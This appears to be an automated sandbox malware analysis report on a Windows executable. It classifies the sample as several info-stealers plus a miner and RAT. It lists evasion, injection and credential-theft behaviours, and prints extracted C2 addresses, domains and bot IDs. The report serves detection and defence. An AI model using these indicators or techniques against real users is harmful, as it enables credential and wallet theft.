Windows Analysis Report
FileApp.exe

Overview

General Information

Sample name: FileApp.exe
Analysis ID: 1504272
MD5: 84fb9da5b4879a284fe19a1635d9ee39
SHA1: 6e7156eb87e3e376ae128eb40e1cc365ad80467e
SHA256: 45bd836cdf29ad666cc785f6df5e9ff0e43e9cb63ff06aca339fdb1f3ddbfa34
Tags: exeTofsee
Infos:

Detection

LummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops PE files to the document folder of the user
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Modifies power options to not sleep / hibernate
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
Name Description Attribution Blogpost URLs Link
zgRAT zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection
barindex
Antivirus detection for URL or domain
Source: stamppreewntnq.shop URL Reputation: Label: phishing
Source: condedqpwqm.shop URL Reputation: Label: phishing
Source: locatedblsoqp.shop URL Reputation: Label: phishing
Source: traineiwnqo.shop URL Reputation: Label: malware
Found malware configuration
Source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
Source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199768374681", "https://t.me/edm0d"], "Botnet": "6eeb5dff1d479d082f77f2c9017c3bf5"}
Source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "147.45.47.36:30035", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack Malware Configuration Extractor: LummaC {"C2 url": ["traineiwnqo.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "stamppreewntnq.shop", "locatedblsoqp.shop", "millyscroqwp.shop"], "Build id": "E6UHNR--"}
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe ReversingLabs: Detection: 66%
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe ReversingLabs: Detection: 87%
Source: C:\Users\userEHJKFCGHID.exe ReversingLabs: Detection: 66%
Source: C:\Users\userFBKKJEBFID.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66c6fcb30b9dd_123p[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d60cd3ce002_SeparatelyDied[1].exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d72df86b9f3_crypted[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d58b1858bcb_crypted[1].exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[2].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d59ef9d4404_premium[1].exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d707730e9bf_s[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d1b7f7f3765_Front[1].exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d70e8640404_trics[1].exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lamp[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: FileApp.exe ReversingLabs: Detection: 23%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: caffegclasiqwp.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: stamppreewntnq.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: stagedchheiqwo.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: millyscroqwp.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: evoliutwoqm.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: condedqpwqm.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: traineiwnqo.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: locatedblsoqp.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: traineiwnqo.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: E6UHNR--
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 22_2_00409BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 22_2_00418940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 22_2_0040C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 22_2_00407280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 22_2_00409B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C3A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 22_2_69C3A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C60180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 22_2_69C60180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C343B0 PK11_PubEncryptPKCS1,PR_SetError, 22_2_69C343B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 22_2_69C825B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C344C0 PK11_PubEncrypt, 22_2_69C344C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C34440 PK11_PrivDecrypt, 22_2_69C34440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C04420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 22_2_69C04420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 22_2_69C5A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C1E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 22_2_69C1E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C3A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 22_2_69C3A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C18670 PK11_ExportEncryptedPrivKeyInfo, 22_2_69C18670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C39840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 22_2_69C39840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C33850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 22_2_69C33850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5DA40 SEC_PKCS7ContentIsEncrypted, 22_2_69C5DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C17D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 22_2_69C17D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 22_2_69C5BD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C57C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 22_2_69C57C00

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Uses 32bit PE files
Source: FileApp.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 76.76.21.98:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.6:53024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:53035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53039 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53045 version: TLS 1.2
Source: FileApp.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdb source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdbI source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: premium_gitrep.pdbx source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.PDB source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdb source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: PE.pdb source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2130007558.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: adsbrowser.pdb(D source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Windows\exe\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BotClient.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: adsbrowser.pdb source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: HP.o<C:\Windows\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2563660175.00000000012F9000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_004062EB FindFirstFileW,FindClose, 14_2_004062EB
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 14_2_00406CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040D8C0
